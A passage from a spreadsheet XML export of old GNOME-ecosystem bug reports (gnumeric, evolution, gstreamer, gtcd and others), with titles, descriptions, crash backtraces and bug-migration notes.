  battery.reporting.warning = 0  (0x0)  (int)
  battery.serial = '7852'  (string)
  battery.technology = 'unknown'  (string)
  battery.type = 'primary'  (string)
  battery.voltage.current = 15000  (0x3a98)  (int)
  battery.voltage.design = 15000  (0x3a98)  (int)
  battery.voltage.unit = 'mV'  (string)
GNOME Power Manager Process Information:
cristian  2442  0.0  2.2  60516 23228 ?        Ss   Jun04   0:00 gnome-power-manager
cristian  4393  0.7  0.5  23380  5820 ?        S    03:16   0:00  \_ /usr/libexec/gnome_segv gnome-power-manager 5 2.19.2
cristian  4394 12.2  2.2  52884 23060 ?        S    03:16   0:00      \_ /usr/bin/bug-buddy --appname=gnome-power-manager --pid=2442 --package-ver=(null)
HAL Process Information:
68        1952  0.0  0.3   5148  3148 ?        Ss   Jun04   0:03 hald
root      1953  0.0  0.0   3244   960 ?        S    Jun04   0:00  \_ hald-runner
68        1964  0.0  0.0   2076   792 ?        S    Jun04   0:00      \_ hald-addon-keyboard: listening on /dev/input/event1
68        1965  0.0  0.0   2072   788 ?        S    Jun04   0:00      \_ hald-addon-keyboard: listening on /dev/input/event3
68        1968  0.0  0.0   2076   788 ?        S    Jun04   0:00      \_ hald-addon-keyboard: listening on /dev/input/event4
68        1969  0.0  0.0   2072   792 ?        S    Jun04   0:00      \_ hald-addon-keyboard: listening on /dev/input/event5
root      1997  0.0  0.0   3308  1000 ?        S    Jun04   0:00      \_ /usr/libexec/hald-addon-cpufreq
68        1998  0.0  0.0   2076   844 ?        S    Jun04   0:00      \_ hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event
root      2008  0.0  0.0   3296   884 ?        S    Jun04   0:03      \_ hald-addon-storage: polling /dev/scd0 (every 2 sec)
----------- .xsession-errors (14483 sec old) ---------------------
***MEMORY-WARNING***: [2429]: GSlice: g_thread_init() must be called before all other GLib functions memory corruption due to late invocation of g_thread_init() has been detected this program is lik
error getting update info:  Cannot open/read repomd.xml file for repository: development
** Message:   Sie sind nun mit dem drahtlosen Netzwerk 'Calypso' verbunden.
error getting update info:  Cannot open/read repomd.xml file for repository: development
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
Loading installonlyn plugin
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
** Message: Could not connect to power manager: Could not get owner of name 'org.gnome.PowerManager': no such name
--------------------------------------------------</t>
  </si>
  <si>
    <t>celsius</t>
  </si>
  <si>
    <t>GNOME-APPLETS-121574</t>
  </si>
  <si>
    <t>StickyNotes broken UTF8 Translation in Schemas file.</t>
  </si>
  <si>
    <t>Since a couple of days there is a broken String in StickyNotes applet which
cause an error (not valid UTF8 encoding) when trying to install it. This
really needs a fix.</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-311599</t>
  </si>
  <si>
    <t>gnome-mouse-properties crash at startup</t>
  </si>
  <si>
    <t>Distribution/Version: Gentoo
1. click on the icon in menu
2. wait one seconde
3. see bugbuddy starting to report the crash :-)</t>
  </si>
  <si>
    <t>GNOME-PRINT-133926</t>
  </si>
  <si>
    <t>/tmp</t>
  </si>
  <si>
    <t>It would be better to use g_get_tmp_dir here:
./libgnomeprint/libgnomeprint/modules/cups/gnome-print-cups-transport.c:  
      transport-&gt;temp_file = g_strdup (/tmp/gnome-print-cups-XXXXXX)
./libgnomeprint/libgnomeprint/gnome-print-ps2.c:        tmp = g_strdup
(/tmp/gnome-print-XXXXXX)</t>
  </si>
  <si>
    <t>GSTREAMER-385084</t>
  </si>
  <si>
    <t>endless ghost pad pull/push activate recursion until crash</t>
  </si>
  <si>
    <t>Try (with valid URI):
 gst-launch-0.10 http://host/foo.ogg ! identity ! decodebin ! fakesink
This crashes here like this:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1218823264 (LWP 31870)]
0xb7ed0399 in gst_pad_get_type () at gstpad.c:193
193     {
(gdb) (gdb) #0  0xb7ed0399 in gst_pad_get_type () at gstpad.c:193
#1  0xb7ed8332 in gst_pad_activate_push (pad=0x8128810 active=0) at gstpad.c:822
#2  0xb7ec5bf5 in gst_ghost_pad_do_activate_push (pad=0x8128000 active=0) at gstghostpad.c:630
#3  0xb7ed83c4 in gst_pad_activate_push (pad=0x8128000 active=0) at gstpad.c:863
#4  0xb7ed807a in gst_pad_activate_pull (pad=0x8128000 active=0) at gstpad.c:731
#5  0xb7ec5f5b in gst_ghost_pad_internal_do_activate_pull (pad=0x8128810 active=0) at gstghostpad.c:609
#6  0xb7ed7f84 in gst_pad_activate_pull (pad=0x8128810 active=0) at gstpad.c:756
#7  0xb7ed84ea in gst_pad_activate_push (pad=0x8128810 active=0) at gstpad.c:850
#8  0xb7ec5bf5 in gst_ghost_pad_do_activate_push (pad=0x8128000 active=0) at gstghostpad.c:630
#9  0xb7ed83c4 in gst_pad_activate_push (pad=0x8128000 active=0) at gstpad.c:863
#10 0xb7ed807a in gst_pad_activate_pull (pad=0x8128000 active=0) at gstpad.c:731
#11 0xb7ec5f5b in gst_ghost_pad_internal_do_activate_pull (pad=0x8128810 active=0) at gstghostpad.c:609
#12 0xb7ed7f84 in gst_pad_activate_pull (pad=0x8128810 active=0) at gstpad.c:756
#13 0xb7ed84ea in gst_pad_activate_push (pad=0x8128810 active=0) at gstpad.c:850
#14 0xb7ec5bf5 in gst_ghost_pad_do_activate_push (pad=0x8128000 active=0) at gstghostpad.c:630
...</t>
  </si>
  <si>
    <t>DOXYGEN-164072</t>
  </si>
  <si>
    <t>Superfluous entries of external classes in the class hierarchy</t>
  </si>
  <si>
    <t>If an undocumented class MyClass inherits from an external 
class ExternalClass specified in a tag file and  HIDE_UNDOC_CLASSES = YES 
then ExternalClass appears in the class hierarchy (without any descendents) 
even if ALLEXTERNALS = NO.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-24144</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtcd
Severity: normal
Version: 1.0.51
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12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0x404d58e9 in __wait4 () from /lib/libc.so.6
#0  0x404d58e9 in __wait4 () from /lib/libc.so.6
#1  0x405341ec in ?? () from /lib/libc.so.6
#2  0x40083591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x40462c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40271755 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
#5  0x804ff69 in draw_status ()
#6  0x805023b in slow_timer ()
#7  0x403fe04d in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#8  0x403fd186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#9  0x403fd751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#10 0x403fd8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#11 0x401c45b9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#12 0x80513d0 in main ()
#13 0x4045c9cb in __libc_start_main (main=0x80511a0  argc=4 
    argv=0xbffffcd4 init=0x804d7e0  fini=0x805971c  
    rtld_fini=0x4000ae60  stack_end=0xbffffccc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x404d58e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405341ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40083591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40462c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40271755 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
No symbol table info available.
#5  0x804ff69 in draw_status ()
No symbol table info available.
#6  0x805023b in slow_timer ()
No symbol table info available.
#7  0x403fe04d in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:41 -------
This bug was previously known as bug 24144 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=24144
Originally filed under the gnome-media product and gtcd component.
Unknown version 1.0.x in product gnome-media. Setting version to the default unspecified.
The original reporter (tarun@chick073.shiratori.private) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>tarun</t>
  </si>
  <si>
    <t>METACITY-102175</t>
  </si>
  <si>
    <t>improve minimize animation</t>
  </si>
  <si>
    <t>Three things need to be done to improve the metacity minimize animation.
1. Speed it up and make it smoother.
2. Make the lines thiner.
3. The window should be drawn after not before the animation is drawn.
I'm going to attach a patch that addresses the first two items. I changes to
using the DRAW_ROOT animation which has none of the smoothness problems of
the current animation. It also speeds up the animation.
The problem with the DRAW_ROOT animation is that the area behind the window
isn't redrawn until after the animation. This is not a problem once number 3 
is implemented bacause the window is redrawn after the animation.
Windows and Enlightement both undraw the window after the animation and it
looks a lot better and smoother and snappier.
Unfortuantely I was not able to work out how to implement 3 so that still
needs to be done.</t>
  </si>
  <si>
    <t>GTHUMB-113978</t>
  </si>
  <si>
    <t>printing non-ascii comments</t>
  </si>
  <si>
    <t>When I try printing an image with comment containing non-ascii symbols (in
my case Cyrillic) in gThumb 2.1.2 empty boxes are printed instead of
non-ascii symbols. I do have a number of fonts (TrueType and Type 1)
installed that contain Cyrillic glyphs and say gedit has no problems
printing Cyrillic texts.</t>
  </si>
  <si>
    <t>EKIGA-306204</t>
  </si>
  <si>
    <t>FAQ link used by gnomemeeting 404</t>
  </si>
  <si>
    <t>Set gconf permissions so user A cannot change values.
Run gnomemeeting as user A.
gnomemeeting pops up a dialog including a link to
http://www.gnomemeeting.org/faq.php.
Follow the link.
Desired behavior:  See the gnomemeeting FAQ.
Actual behavior:  See a 404 Not Found page.
Suggestions:
 1) Make http://www.gnomemeeting.org/faq.php a redirect to the current FAQ page
(to support current and earlier versions).
 2) Make a implementation-nonspecific URL http://www.gnomemeeting.org/faq or
similar which redirects to wherever the FAQ is going to be at any time. Change
the link in the source code to be this URL. (to gracefully handle future moves)</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-125374</t>
  </si>
  <si>
    <t>cleanup music support</t>
  </si>
  <si>
    <t>Attached is my attempt at cleaning up the audio CD support.  It works for
me and was reviewed some time ago but I can't recall what the state was.
Another review can't hurt and this way I can't loose the discussion...</t>
  </si>
  <si>
    <t>EVOLUTION-225998</t>
  </si>
  <si>
    <t>Evolution crashed on exit after an IMAP check failure.</t>
  </si>
  <si>
    <t>Description of Problem:
The crash happened when I selected File&gt;Exit after
I started it &amp; it failed to auto-check my IMAP
account on startup as it normally does. 
How often does this happen? 
The IMAP autocheck failure happens intermittently
about every third time I run Eclipse.
The crash has only happened once so far.
Additional Information:
Stack trace:
(no debugging symbols found)...(no debugging
symbols found)...
(no debugging symbols found)...0x40f48639 in wait4
() from /lib/libc.so.6
#0  0x40f48639 in wait4 () from /lib/libc.so.6
#1  0x40fcc7f8 in sys_sigabbrev () from /lib/libc.so.6
#2  0x402440f3 in waitpid () from /lib/libpthread.so.0
#3  0x40a2b802 in
gnome_icon_entry_set_pixmap_subdir ()
   from /usr/lib/libgnomeui.so.32
#4  0x40241e3b in raise () from /lib/libpthread.so.0
#5  0x40ed1778 in sigaction () from /lib/libc.so.6
#6  0x40cc8e89 in gtk_object_get_data_by_id ()
from /usr/lib/libgtk-1.2.so.0
#7  0x40ce4533 in gtk_signal_disconnect_by_func ()
   from /usr/lib/libgtk-1.2.so.0
#8  0x08055732 in e_summary_mail_free ()
#9  0x08051f84 in component_factory_init ()
#10 0x40cb8316 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#11 0x40ce2877 in gtk_signal_handlers_destroy ()
from /usr/lib/libgtk-1.2.so.0
#12 0x40ce22cb in gtk_signal_emit () from
/usr/lib/libgtk-1.2.so.0
#13 0x40cca22f in gtk_trace_referencing () from
/usr/lib/libgtk-1.2.so.0
#14 0x40d1ae04 in gtk_widget_get_default_visual ()
   from /usr/lib/libgtk-1.2.so.0
#15 0x40cc8f4b in gtk_object_destroy () from
/usr/lib/libgtk-1.2.so.0
#16 0x40d187bf in gtk_widget_destroy () from
/usr/lib/libgtk-1.2.so.0
#17 0x40c4ed81 in gtk_bin_get_type () from
/usr/lib/libgtk-1.2.so.0
#18 0x40c77246 in
gtk_container_set_focus_hadjustment ()
   from /usr/lib/libgtk-1.2.so.0
#19 0x40d1eecf in gtk_window_set_geometry_hints ()
   from /usr/lib/libgtk-1.2.so.0
#20 0x401eea84 in bonobo_plug_new () from
/usr/lib/libbonobox.so.2
#21 0x40cb8316 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#22 0x40ce2877 in gtk_signal_handlers_destroy ()
from /usr/lib/libgtk-1.2.so.0
#23 0x40ce22cb in gtk_signal_emit () from
/usr/lib/libgtk-1.2.so.0
#24 0x40cca22f in gtk_trace_referencing () from
/usr/lib/libgtk-1.2.so.0
#25 0x40d1ae04 in gtk_widget_get_default_visual ()
   from /usr/lib/libgtk-1.2.so.0
#26 0x40d1edbf in gtk_window_set_geometry_hints ()
   from /usr/lib/libgtk-1.2.so.0
#27 0x40cc8f4b in gtk_object_destroy () from
/usr/lib/libgtk-1.2.so.0
#28 0x40d187bf in gtk_widget_destroy () from
/usr/lib/libgtk-1.2.so.0
#29 0x40cb696e in gtk_main_do_event () from
/usr/lib/libgtk-1.2.so.0
#30 0x40d5750f in gdk_flush () from
/usr/lib/libgdk-1.2.so.0
#31 0x40d879e2 in
g_source_remove_by_funcs_user_data ()
   from /usr/lib/libglib-1.2.so.0
#32 0x40d87e04 in
g_source_remove_by_funcs_user_data ()
   from /usr/lib/libglib-1.2.so.0
#33 0x40d88b6c in g_main_run () from
/usr/lib/libglib-1.2.so.0
#34 0x40cb66ce in gtk_main () from
/usr/lib/libgtk-1.2.so.0
#35 0x401aaac7 in bonobo_main () from
/usr/lib/libbonobo.so.2
#36 0x0805da92 in main ()
#37 0x40ebf142 in __libc_start_main () from
/lib/libc.so.6
#0  0x40f48639 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x40fcc7f8 in sys_sigabbrev () from /lib/libc.so.6
No symbol table info available.
#2  0x402440f3 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40a2b802 in
gnome_icon_entry_set_pixmap_subdir ()
   from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x40241e3b in raise () from /lib/libpthread.so.0
No symbol table info available.
#5  0x40ed1778 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x40cc8e89 in gtk_object_get_data_by_id ()
from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x40ce4533 in gtk_signal_disconnect_by_func ()
   from /usr/lib/libgtk-1.2.so.0
No symbol table info available.</t>
  </si>
  <si>
    <t>BANSHEE-344795</t>
  </si>
  <si>
    <t>Fix mass storage DAP detection by .is_audio_player</t>
  </si>
  <si>
    <t>Detection of a mass storage DAP by the presence of a .is_audio_player file in it's root currently doesn't work due to a misplaced checks.</t>
  </si>
  <si>
    <t>jstembridge</t>
  </si>
  <si>
    <t>GTHUMB-316084</t>
  </si>
  <si>
    <t>Opening a folder in fullscreen starts in black screen instead of first image</t>
  </si>
  <si>
    <t>Please describe the problem:
Hi
if you open a folder in fullscreen with gthumb from commandline or from nautilus
(edited launcher with gthumb --fullscreen) after enter fullscreen doesn't
show first image instead it shows a black screen.
Steps to reproduce:
In terminal:
$ gthumb --fullscreen a_folder_with_photos
Actual results:
A black screen appear.
Expected results:
First image of the folder is showed. 
Does this happen every time?
yes
Other information:
The normal usecase is someone that edits the launcher in nautilus to open in
fullscreen.</t>
  </si>
  <si>
    <t>PANGO-166832</t>
  </si>
  <si>
    <t>rotating text by 180 degrees doesn't work</t>
  </si>
  <si>
    <t>Please describe the problem:
All other angles seem to work fine but trying to render text exactly upside
down yields catastrophic results.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GNUMERIC-53077</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnumeric
Severity: normal
Version: 0.48
&gt;Synopsis: 
&gt;Class: sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-12 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.6
GTK+: 1.2.6
ORBit: ORBit 0.5.0
gnome-libs: gnome-libs 1.0.55
gnome-core: gnome-core-1.0.55-12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0x404e68e9 in __wait4 () from /lib/libc.so.6
#0  0x404e68e9 in __wait4 () from /lib/libc.so.6
#1  0x405451ec in ?? () from /lib/libc.so.6
#2  0x40110591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x40473c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x80a641d in workbook_is_pristine ()
#5  0x40251efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#6  0x4027f5fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#7  0x4027ea42 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#8  0x4027cb95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#9  0x402b1b88 in gtk_widget_activate () from /usr/lib/libgtk-1.2.so.0
#10 0x402594eb in gtk_menu_shell_activate_item () from /usr/lib/libgtk-1.2.so.0
#11 0x4025886b in gtk_menu_shell_button_release ()
   from /usr/lib/libgtk-1.2.so.0
#12 0x40251ac9 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#13 0x4027ea7b in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x4027cb95 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#15 0x402b1a3c in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#16 0x40251a22 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#17 0x40250c7a in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#18 0x402fc4db in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#19 0x4043d186 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#20 0x4043d751 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#21 0x4043d8f1 in g_main_run () from /usr/lib/libglib-1.2.so.0
#22 0x402505b9 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#23 0x806093c in _start ()
#24 0x8060992 in main ()
#25 0x4046d9cb in __libc_start_main (main=0x8060980  argc=1 
    argv=0xbffffa04 init=0x805de40  fini=0x810bdac  
    rtld_fini=0x4000ae60  stack_end=0xbffff9fc)
    at ../sysdeps/generic/libc-start.c:92
#0  0x404e68e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405451ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40110591 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40473c68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x80a641d in workbook_is_pristine ()
No symbol table info available.
#5  0x40251efd in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x4027f5fd in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x4027ea42 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-04-11 01:07 -------
The original reporter (sanjoy@ehp11.saha.ernet.in) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>GNOME-CORE-12564</t>
  </si>
  <si>
    <t>menu panel stays in middle of screen can't be moved</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  helix gnome 1.2 
Synopsis: menu panel stays in middle of screen can't be moved
Class:    sw-bug
Distribution: Red Hat Linux release 6.1 (Cartman)
System: Linux 2.2.15 i686 unknown
C library: glibc-2.1.2-11
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.0
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.0
Description:
instead at the top of my screen the menu panel stays at the middle of
my screen and it can't be moved.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:11 -------
This bug was previously known as bug 12564 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=12564
Originally filed under the gnome-core product and panel component.
The original reporter (djcb@dds.nl) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>djcb</t>
  </si>
  <si>
    <t>WEBSITE-117961</t>
  </si>
  <si>
    <t>mispelling http://www.gnome.org/about/</t>
  </si>
  <si>
    <t>under accessibility peope should be people</t>
  </si>
  <si>
    <t>GNOME-MEDIA-36533</t>
  </si>
  <si>
    <t>CD Player Crash</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gtcd
Severity: normal
Version:  1.2.0
Synopsis: CD Player Crash
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.18pre11-va1.1 i686 unknown
C library: glibc-2.1.94-3
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit-0.5.3-2
gnome-libs: gnome-libs-1.2.4-11
libxml: 1.8.9
gnome-print: gnome-print-0.20-8
gnome-core: gnome-core-1.2.1-33
Description:
When closing the program it issued a crash statement.  CD was still in
drive at the time.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x40555ca9 in __wait4 () from /lib/libc.so.6
#0  0x40555ca9 in __wait4 () from /lib/libc.so.6
#1  0x405be740 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40092b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x402fa6ab in XSetForeground () from /usr/X11R6/lib/libX11.so.6
#5  0x40295fa3 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
#6  0x804f8c0 in draw_titles ()
#7  0x804fc09 in draw_status ()
#8  0x804ff3f in slow_timer ()
#9  0x4045c983 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#10 0x4045b987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#11 0x4045c001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#12 0x4045c1cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#13 0x401dde57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#14 0x8051225 in main ()
#15 0x404c0a2c in __libc_start_main (main=0x8050fa0  argc=4 
    ubp_av=0xbffffa94 init=0x804d778  fini=0x8059a3c  
    rtld_fini=0x4000d3c8  stack_end=0xbffffa8c)
    at ../sysdeps/generic/libc-start.c:111
#0  0x40555ca9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405be740 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40092b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x402fa6ab in XSetForeground () from /usr/X11R6/lib/libX11.so.6
No symbol table info available.
#5  0x40295fa3 in gdk_gc_set_foreground () from /usr/lib/libgdk-1.2.so.0
No symbol table info available.
#6  0x804f8c0 in draw_titles ()
No symbol table info available.
#7  0x804fc09 in draw_status ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:42 -------
This bug was previously known as bug 36533 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=36533
Originally filed under the gnome-media product and gtcd component.
Unknown version 1.2.x in product gnome-media. Setting version to the default unspecified.
The original reporter (stiffy@nerds.org) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component peter@ximian.com.
</t>
  </si>
  <si>
    <t>stiffy</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-307821</t>
  </si>
  <si>
    <t>Re: [Bug 307686] evolution-exchange-storage crash</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: My Linux release 3.5 (Rainbow)
Package: Evolution
Severity: normal
Version: GNOME2.10.1 unspecified
Gnome-Distributor: GNOME.Org
Synopsis: Re: [Bug 307686] evolution-exchange-storage crash
Bugzilla-Product: Evolution
Bugzilla-Component: Miscellaneous
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
I've rebuilt evolution with debuginfo.  Is this backtrace any better?
Debugging Information:
Backtrace was generated from '/usr/libexec/evolution-exchange-storage'
Using host libthread_db library /lib/tls/libthread_db.so.1.
0x007447a2 in ?? () from /lib/ld-linux.so.2
#0  0x007447a2 in ?? () from /lib/ld-linux.so.2
#1  0x009bc40b in waitpid () from /lib/tls/libpthread.so.0
#2  0x02bedc90 in libgnomeui_module_info_get ()
   from /usr/lib/libgnomeui-2.so.0
#3  0x009bc8b8 in funlockfile () from /lib/tls/libpthread.so.0
#4  0x0023c6dc in e_account_list_save (account_list=0x0)
    at e-account-list.c:298
#5  0x08067ecc in account_moved (account=0x939fe38 ac=0x94fb810)
    at exchange-account.c:838
#6  0x08068a61 in exchange_account_connect (account=0x939fe38)
    at exchange-account.c:1402
#7  0x0806c9ba in account_added (account_list=0x9391b38
account=0x93b6058)
    at exchange-config-listener.c:633
#8  0x0806cdac in account_changed (account_list=0x9391b38
account=0x93b6058)
    at exchange-config-listener.c:713
#9  0x00c6f9ab in g_cclosure_marshal_VOID__OBJECT ()
   from /usr/lib/libgobject-2.0.so.0
#10 0x00c5a102 in g_cclosure_new_swap () from
/usr/lib/libgobject-2.0.so.0
#11 0x00c59e6d in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#12 0x00c6d51d in g_signal_has_handler_pending ()
   from /usr/lib/libgobject-2.0.so.0
#13 0x00c6e9da in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#14 0x00c6ec90 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#15 0x0023c436 in gconf_accounts_changed (client=0x938bd48 
    cnxn_id=4278190084 entry=0x93b60c0 user_data=0x9391b38)
    at e-account-list.c:178
#16 0x0298afe4 in gconf_client_change_set_from_current ()
   from /usr/lib/libgconf-2.so.4
#17 0x0297b44a in gconf_listeners_notify () from
/usr/lib/libgconf-2.so.4
#18 0x0298b0bf in gconf_client_change_set_from_current ()
   from /usr/lib/libgconf-2.so.4
#19 0x0298b2da in gconf_client_notify () from /usr/lib/libgconf-2.so.4
#20 0x00bf8d5b in g_child_watch_add () from /usr/lib/libglib-2.0.so.0
#21 0x00bf5eb8 in g_main_context_dispatch () from
/usr/lib/libglib-2.0.so.0
#22 0x00bf76d7 in g_main_context_acquire () from
/usr/lib/libglib-2.0.so.0
#23 0x00bf79ef in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#24 0x02b3e43f in bonobo_main () from /usr/lib/libbonobo-2.so.0
#25 0x08078242 in main (argc=3 argv=0xbfffb384) at main.c:225
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-06-15 18:28 UTC -------
Bugreport moved from Evolution / Miscellaneous
  to Connector / Connector
</t>
  </si>
  <si>
    <t>GNUMERIC-702485</t>
  </si>
  <si>
    <t>Segfault on a corrupted (fuzzed) xlsx file in dependent_set_expr</t>
  </si>
  <si>
    <t>Segfault on a corrupted (fuzzed) xlsx file in dependent_set_expr.
Git versions of glib goffice gnumeric libgsf and libxml2.
Test case: http://jutaky.com/fuzzing/gnumeric_case_3089_7177.xlsx
Program received signal SIGSEGV Segmentation fault.
0x00007ffff78d12ad in dependent_set_expr (dep=0x18 new_texpr=0x3cfebb0) at dependent.c:408
408		int const t = dependent_type (dep)
(gdb) bt
#0  0x00007ffff78d12ad in dependent_set_expr (dep=0x18 new_texpr=0x3cfebb0) at dependent.c:408
#1  0x00007ffff78d2f86 in dependent_managed_set_expr (dep=0x18 texpr=0x3cfebb0) at dependent.c:1298
#2  0x00007ffff79c8ff1 in gnm_validation_set_expr (v=0x0 texpr=0x3cfebb0 indx=0) at validation.c:417
#3  0x00007fffe4935ef3 in xlsx_validation_expr (xin=0x7fffffffdba0 blob=0x0) at xlsx-read.c:2158
#4  0x00007ffff6dbc5b2 in gsf_xml_in_end_element (state=0x7fffffffdba0 name=0x949599 formula1) at gsf-libxml.c:844
#5  0x00007ffff682762b in xmlParseEndTag1 (ctxt=0x93bb40 line=2) at parser.c:8683
#6  0x00007ffff682bb69 in xmlParseElement__internal_alias (ctxt=0x93bb40) at parser.c:10086
#7  0x00007ffff682b248 in xmlParseContent__internal_alias (ctxt=0x93bb40) at parser.c:9885
#8  0x00007ffff682ba1b in xmlParseElement__internal_alias (ctxt=0x93bb40) at parser.c:10058
